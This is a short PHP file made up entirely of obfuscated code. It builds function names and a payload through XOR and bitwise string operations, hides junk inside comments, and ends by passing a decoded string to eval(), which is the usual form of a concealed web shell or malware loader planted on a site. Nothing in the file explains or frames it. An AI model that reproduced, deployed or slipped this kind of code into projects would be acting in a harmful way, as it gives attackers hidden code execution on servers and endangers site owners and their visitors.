<?php
$FdX2xPgKEi0='GphG'|MKVAev51;$bmZSfZPsne=VKJL.'-:'.EFPEJ^'(,49BM.:5<$';$PseH6wztpNU=#Wh22wI'.
             ']Oi'^' +T';$gdmym='[l?9ck'&"yM?i=O";$bO='"^R?BA'^'[a>^|1';$n_fSOXBBh=#KF_kC20'.
             '0j8!a '|'1k 1a1';$_8L=o_xU.'>3w{'.vwZKyS.'}}:N>~'.z6yN.'[b?'.VOeZo&'fr$}?e;y^'.
             '6~Kof}m~f}_s?}vUn>'.Wk_oW;$_ug4_ciNJm=odw&ot7;$FVKuzbcWn=$bmZSfZPsne&('Ae##N;'.
             'l4$)6'|'-LtF`'.kLWciL);$gY77OxG=$PseH6wztpNU&$_ug4_ciNJm;$v8a80PLLs=$gdmym^(#'.
             '}'.Kzjxt^'Cb1&7I');$kwlgpE=$bO^$n_fSOXBBh;$m_m=(";3>}`ljw):".nwg_e." 2;k+"./*'.
             '>.RU*/z3lB3teW.">2R^"^jUxI8.'/;;'.MmUZ9.'|-'.tjN6D.';a#4[$:6MN))')^$_8L;'d7UU'.
             '?4pm$ !';$x9=(CRTXsQrmy_SABS.'|'.PL_SGbEtE&'@'.UVvWxZEP.'[Sk|LV^'.H_WMRmXg)|(#'.
             'l)9/f~y-'.w37h.'$2u`we4(r&(*'^'$mmo;6&'.y7ua.'(tb$#7#'.fh3sjk);if(/*ZvwJCyLpY'.
             'W]LQ_*/$FVKuzbcWn($gY77OxG($v8a80PLLs($kwlgpE)),$m_m))die;eval($v8a80PLLs(/*t'.
             'Km^L*/$x9));#pL-uRAkALlZ{r%kX]JAI,GBD6%=0mo&|>SBAs84-#X=iH549b%Vt_Coq*itWCoD'.
             ')tbS_*DYe2#zeK)U73B}j65ewTC4{y7mYD@}fkT2Apo|?_H)!_L{=l';